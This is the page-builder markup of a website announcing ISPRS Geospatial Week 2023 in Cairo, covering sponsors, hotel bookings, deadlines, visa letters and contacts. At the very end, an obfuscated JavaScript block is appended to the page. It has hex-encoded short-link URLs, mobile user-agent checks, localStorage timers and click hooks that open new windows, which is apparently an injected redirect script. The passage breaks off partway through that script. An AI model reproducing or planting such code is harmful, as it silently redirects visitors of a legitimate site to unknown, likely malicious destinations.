style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688950756889{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-4990\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 